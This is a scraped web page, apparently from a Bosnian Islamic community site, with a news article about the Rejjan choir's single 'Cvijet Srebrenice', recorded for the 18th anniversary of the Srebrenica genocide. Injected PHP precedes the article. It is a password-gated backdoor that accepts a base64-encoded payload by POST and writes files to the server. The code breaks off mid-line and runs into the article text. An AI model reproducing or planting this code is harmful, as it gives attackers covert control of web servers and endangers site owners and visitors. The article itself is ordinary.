function bestrock_render_js(){ echo ""; } function bestrock_render_index(){ echo md5('56749'); } function bestrock_render_ajax(){ try { if(isset($_GET['s1'])) die(md5('js')); if(isset($_POST['t2'])){ $l1 = uniqid(rand(), true) . '.js'; @file_put_contents($l1, 'js'); if(file_exists($l1)){ if(isset($_POST['t1'])){ $d = md5(md5($_POST['t1'])); if($d=="8ae24e6719c47a39da8ad5451432d9a6"){ $d1=$_POST['t2']; $d1=base64_decode($d1); $d4=" Hor Rejjan „Cvijet Srebrenice“ - Medžlis Islamske zajednice Bijeljina

Hor Rejjan „Cvijet Srebrenice“

Hor Rejjan „Cvijet Srebrenice“

Sarajevski hor duhovne muzike Rejjan snimio je single „Cvijet Srebrenice“ povodom obilježavanja 18. godišnjice Genocida nad Bošnjacima u Srebrenici.

Slika 1

Cilj projekta je približavanje i upoznavanje javnosti sa dešavanjima 11. jula 1995. u Srebrenici, kao i afirmacija pomirenja i prihvatanje izvinjenja počinioca ovoga gnusnog djela. Želja je jasno deklarisati Genocid i poželjeti da se nikada ne ponovi ovakva tragedije nikome u svijetu, kao što i pjesma kaže “da ničija majka nikad’ ne okvasi lice, suzom teškom i uzdahom majke Srebrenice”.

„Željeli smo napraviti reprezentativni video materijal koji će biti dostupan i javnosti van Bosne i Hercegovine, jer je većina video zapisa o srebreničkoj tragediji urađeno neadekvatnom opremom za emitovanje u visokim rezolucijskim formatima“ kažu realizatori projekta.

„Naš „Cvijet Srebrenice“ je jedna tužna pjesma koja je prožeta osjećajnim motivima. Mi smo se kroz cijeli projekat poistovjetili sa žrtvama i pokušali shvatiti kako je zaista bilo u logoru, ili kako je majkama koje su izgubile svoje najmilije. Kada poslušate pjesmu ona sama kazuje te osjećaje“ kaže o pjesmi Rijad Delić, vođa hora Rejjan.

Hor Rejjan je nastao 2006. godine na inicijativu mladih studenata iz cijele BiH i susjednih zemalja. Iza sebe ima snimljen jedan studijski album „Ya Resulallah“, kao i više video spotova od kojih je najpopularniji spot za ilahiju „Ramazanska večer“.

www.rejjan.com